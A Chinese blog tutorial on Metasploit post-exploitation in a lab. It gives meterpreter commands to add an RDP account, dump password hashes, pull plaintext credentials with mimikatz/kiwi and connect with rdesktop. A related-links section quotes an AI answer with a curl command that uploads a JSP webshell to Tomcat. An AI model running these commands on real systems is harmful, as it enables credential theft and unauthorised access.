后渗透攻击(三)

最新推荐文章于 2024-08-16 20:51:47 发布
原创 最新推荐文章于 2024-08-16 20:51:47 发布 · 3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#msf #安全

目录

1、创建新账户

2、获取账号密码

3、远程屏幕控制

在进行提权后我们的操作空间就会大很多,可以进行一系列的创建新账户、获取账号密码、远程操控屏幕等等的操作。该文章就对一些常用的操作进行了整理。

1、创建新账户

查看目标靶机已存在用户  可以在meterpreter中输入:

run  post/windows/gather/enum_logged_on_users ,可见本来只有一个账户,

我们接着用run post/windows/manage/enable_rdp USERNAME= PASSWORD=的指令去自己创建一个账户。

再用上面的指令去查看可能会有延迟,所以我们可以直接去靶机查看,进入win的运行输入netplwiz 可以查看账户创建情况,发现确实多了一个hacker的账户。

 

2、获取账号密码

2.1

很多人喜欢给在计算机设置自动登录 我们可以通过抓取自动登录的账户密码

run windows/gather/credentials/windows_autologin

2.2

如果提示这证明本机并没有配置自动登录

还可以通过导出SAM数据库中的本地用户账号

run post/windows/gather/smart_hashdump

使用  hashdump 获取密码

终端内输入  run hashdump即可,接下来便是通过在线hash来破解即可。

2.3

使用load kiwi

kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用

 终端输入  load kiwi

creds_all  直接获取密码

也可使用kiwi_cmd sekurlsa::logonpasswords  获取密码

***

| ID   | kiwi参数和描述                                         |

| ---- | ------------------------------------------------------ |

| 1    | creds_all:列举所有凭据                                |

| 2    | creds_kerberos:列举所有kerberos凭据                   |

| 3    | creds_msv:列举所有msv凭据                             |

| 4    | creds_ssp:列举所有ssp凭据                             |

| 5    | creds_tspkg:列举所有tspkg凭据                         |

| 6    | creds_wdigest:列举所有wdigest凭据                     |

| 7    | dcsync:通过DCSync检索用户帐户信息                     |

| 8    | dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID  |

| 9    | golden_ticket_create:创建黄金票据                     |

| 10   | kerberos_ticket_list:列举kerberos票据                 |

| 11   | kerberos_ticket_purge:清除kerberos票据                |

| 12   | kerberos_ticket_use:使用kerberos票据                  |

| 13   | kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令 |

| 14   | lsa_dump_sam:dump出lsa的SAM                           |

| 15   | lsa_dump_secrets:dump出lsa的密文                      |

| 16   | password_change:修改密码                              |

| 17   | wifi_list:列出当前用户的wifi配置文件                  |

| 18   | wifi_list_shared:列出共享wifi配置文件/编码

***

3、远程屏幕控制

rdesktop是linux下支持Windows远程桌面连接的客户端程序,在linux系统下可通过它远程访问Windows桌面,支持多种版本。rdesktop是sourceforge下支持GPL协议的一个开源项目,采用RDP(Remote Desktop Protocol,远程桌面协议),几乎可以连接windows的所有版本

在一个新的root界面去执行

rdesktop -u 用户名 -p  密码  -f   IP

即可。

如:

rdesktop -u hacker -p 123456   -g 1024x720 172.16.98.175

 

rdesktop常用参数

| id   | 参数        | 描述                                            |

| ---- | ----------- | ----------------------------------------------- |

| 1    | -u          | 账户名                                          |

| 2    | -p          | 密码                                            |

| 3    | -a 16       | 指使用16位色显示远程画面                        |

| 4    | -f          | 全屏模式(用**Ctrl+Alt+Enter** 组合键退出全屏) |

| 5    | -g          | 设置分辨率 如 :   -g 1024x768                   |

| 6    | rdesktop -h | 查看rdesktop使用帮助                            |

Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz)
Zichel77的博客
10-09 3530
针对WIN7,还是用永恒之蓝。
Hash扩展长度攻击及Hashdump的使用
ZXT02的博客
11-22 2351
Hash扩展长度攻击、Hashdump的使用和相关CTF题目
msf 使用 hashdump 和 wce 提取 hash
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
AD攻防-域用户HashDump追踪之道
喜欢Python编程的程序员柚柚呀
08-24 1452
it,网上dump域用户hash的方式五花八门,少有站在防御者视角对不同的dump方式进行梳理剖析和取证定位的文章,掌握不同dump方式的底层原理才能在EDR对抗时不慌不乱、在应急响应中抓住重点,选择最适合的手段快速达到自己的目的。本文大纲如下:![AAA-
Kali渗透测试:散列密码破解
Bruce_xiaowei的博客
05-26 5929
Kali渗透测试:散列密码破解 某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。 被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到
信息安全技术——渗透攻击
weixin_65036715的博客
04-21 1790
一、渗透攻击的介绍1.1 渗透攻击是什么意思渗透攻击(Penetration,也称“渗透测试”)是一种在授权的情况下,使用技术攻击、破解、测试和安全评估网络系统的安全控制的过程。它的目的是评估其安全防御力度,找出安全漏洞,以增强对黑客和攻击的间接抵御能力,以防止非授权的访问,保护网络系统的机密信息和数据安全。渗透攻击的基本思想是逐步有步骤地检查目标站点的所有可使用的服务,从而识别任何可能利用的漏洞和滥用点,并证实这些漏洞是否可能被利用来实现目标站点的渗透。
kali渗透攻击
whb158268的博客
06-12 2221
渗透攻击是指黑客为了获得非法利益,通过各种手段进入网络系统、计算机系统中,在未经授权的情况下获取信息、利用漏洞控制系统和执行越权操作的一种行为。其目的在于获取非法利益、破坏或窃取关键数据,以及对网络系统进行控制。而Kali渗透攻击则是一种专门用于模拟黑客攻击的方法,用于评估系统和网络的安全性。
实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】
weixin_45266856的博客
12-19 2018
MSF是利用发现的安全漏洞或配置弱点对远程目标进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问的一个代码模块。是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。攻击载荷是渗透目标系统之后完成实际攻击功能的代码,用于在目标系统上运行任意命令或者执行特定代码。
后渗透(内网渗透学习笔记)
姜小孩的博客
03-13 2108
内网学习笔记
Metasploit漏洞利用系列():MSF渗透测试实战——网络服务器攻击渗透
2402_86373248的博客
08-16 776
本文将围绕一个典型场景——利用MS17-010漏洞对Windows服务器进行渗透测试,以展示Metasploit的强大功能和渗透测试的实际操作步骤。通过本次实战,我们不仅展示了Metasploit在渗透测试中的强大能力,同时也提醒所有系统管理员及时更新系统和打补丁的重要性。记住,合法的渗透测试应当在授权和法律允许的范围内进行,旨在帮助提升网络安全,而非非法入侵。后续行动建议:在完成渗透测试后,撰写详细的报告,总结发现的安全漏洞,并提出相应的修补建议,帮助客户加强网络安全防护体系。命令检查目标是否易受攻击。
抓取内网Windows明文密码hashdump抓取密文
M372109150的博客
05-01 660
msf远程控制实验,首先生成一个木马控制程序--mpf.exe,然后启用MSF攻击平台, 再加载模块和选择payload,并且设置payload参数并且进行监听,提权,hashdump抓取hash值 思考题:windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文 我们通过hashdump 抓取出 所有用户的密文,分为两个模块,为什么? 这两个模块分别都代表什么 为什么第一个模块 永远是一样的aad3 这两个模块的加密算法有什么不同,如何加密的
dump hash常见方法总结
weixin_44747030的博客
10-01 2077
Dump Hash常见方法总结
MSF后渗透操作
weixin_51583379的博客
11-03 1806
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
MSF抓取密码
qq_42383069的博客
03-24 2180
MSF抓取密码 导出密码哈希 run hashdump命令   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限 在meterpreter_shell中执行run hashdump命令 命令: run hashdump 用户哈希数据的输出格式为: 用户名:SID:LM哈希:NTLM哈希::: 3. run windows/gather/smart_hashdump命令   run windows/gather/smart_hashdump命令的使用需要系统权限。该
msf抓取hashdump的思考
a15183865601的博客
04-25 1363
1. windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文2. 我们通过hashdump 抓取出 所有用户的密文,分为两个模块,为什么?这两个模块分别都代表什么3. 为什么第一个模块 永远是一样的aad34. 这两个模块的加密算法有什么不同,如何加密的。
多种姿势抓取windows系统的hash
p_utao的博客
09-12 6143
hashdump抓取密码 从目标机中提取hash值,破解hash值就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 1万+
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
渗透攻击tomcat
最新发布
02-28
<think>好的,用户让我介绍一下渗透攻击Tomcat的方法。首先,我需要确保自己理解Tomcat是什么。Tomcat是Apache软件基金会的一个开源Java Servlet容器,通常用于部署和运行Java Web应用程序。作为常见的中间件,它可能成为攻击者的目标,尤其是如果配置不当的话。 接下来,用户提到的“渗透攻击”可能指的是如何识别和利用Tomcat中的安全漏洞。首先,我需要考虑常见的Tomcat漏洞类型。例如,默认配置弱口令、未授权访问、版本过低的漏洞,比如CVE-2017-12615(远程代码执行)等。 然后,我需要分步骤解释渗透测试的流程。通常包括信息收集、漏洞扫描、漏洞利用、权限提升和维持访问。对于Tomcat,信息收集可能涉及端口扫描(默认8080端口),识别Tomcat版本,管理界面路径(如/manager/html)。 漏洞扫描部分,可以提到使用工具如Nmap的脚本(http-vuln-*)或者专门针对Tomcat的漏洞检测工具。比如检查是否存在PUT方法漏洞,或者管理界面是否暴露。 漏洞利用方面,比如利用弱口令登录管理界面,部署恶意的WAR文件进行远程代码执行。或者利用CVE-2017-12615通过PUT方法上传JSP木马。 权限提升可能涉及利用服务器上的其他漏洞,比如提权到root或系统权限。维持访问可能包括创建后门账户,安装Web Shell等。 同时,必须强调合法性和道德性,未经授权的渗透测试是非法的。应该建议用户在授权范围内进行测试,并给出加固建议,如更改默认密码,限制管理界面访问,及时更新版本等。 需要注意的是,用户可能对渗透测试的具体技术细节感兴趣,但作为回答者,应该避免提供可用于非法攻击的详细步骤,而是侧重在防御和加固措施上。此外,确保回答中提到的漏洞是公开的,并且提供解决方案,帮助用户提高安全意识。 可能用户是安全研究人员或系统管理员,希望了解如何保护Tomcat服务器。因此,在介绍渗透方法时,重点应放在识别漏洞和防护措施,而不是详细的攻击步骤。同时,需要提醒用户遵循法律法规,只在授权环境下进行测试。 最后,确保回答结构清晰,分步骤说明,并正确使用LaTeX格式,特别是变量和代码部分需要用行内公式标记。例如,提到版本号时使用$v9.0.0$,端口号$8080$,路径如/manager/html等。</think>### 渗透攻击Tomcat的基本原理与防护建议 Tomcat作为广泛使用的Java Web中间件,常因配置不当或版本漏洞成为攻击目标。以下从渗透测试角度简要说明常见攻击路径,并重点强调防御措施(注:本文仅用于安全研究,禁止非法使用)。 --- #### 一、常见攻击面分析 1. **信息收集** - 端口扫描:Tomcat默认使用$8080$端口,可通过`nmap -p 8080 <target>`识别 - 版本探测:通过HTTP响应头`Server: Apache-Coyote/1.1`或`/manager/html`页面获取版本(如$v9.0.0$) 2. **管理后台暴露** 默认管理路径: $$ \text{/manager/html(部署应用)}, \quad \text{/host-manager/html(虚拟主机管理)} $$ 3. **弱口令爆破** 尝试默认凭证(如`admin:admin`、`tomcat:tomcat`),或使用字典攻击。 --- #### 二、典型漏洞示例 1. **CVE-2017-12615(PUT方法任意文件上传)** - **漏洞条件**:Tomcat $≤9.0.0$,启用HTTP PUT方法 - **利用方式**: ```bash curl -X PUT http://target:8080/shell.jsp/ --data-binary @webshell.jsp ``` 2. **后台部署WAR木马** - 通过`/manager/html`上传恶意WAR包,自动解压执行代码 - 需绕过弱口令或会话劫持 --- #### 、防御加固建议 1. **访问控制** - 限制管理后台IP访问(修改`conf/server.xml`): ```xml <Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="192.168.1.0/24" /> ``` - 禁用PUT/DELETE方法(`conf/web.xml`中注释对应配置) 2. **认证强化** - 修改默认账号密码(`conf/tomcat-users.xml`) - 启用强密码策略(长度≥12,含大小写字母、数字、符号) 3. **版本与配置** - 及时升级到最新稳定版(当前推荐$≥v10.1.0$) - 关闭调试模式(`org.apache.catalina.valves.ErrorReportValve`设置`showReport=false`) --- #### 四、渗透测试合法性声明 任何渗透测试必须遵守《网络安全法》并获得**书面授权**。非法入侵将面临刑事责任(《刑法》第285条)。 > 提示:企业可通过定期漏洞扫描(如Nessus、OpenVAS)和代码审计(如Fortify)主动防御攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值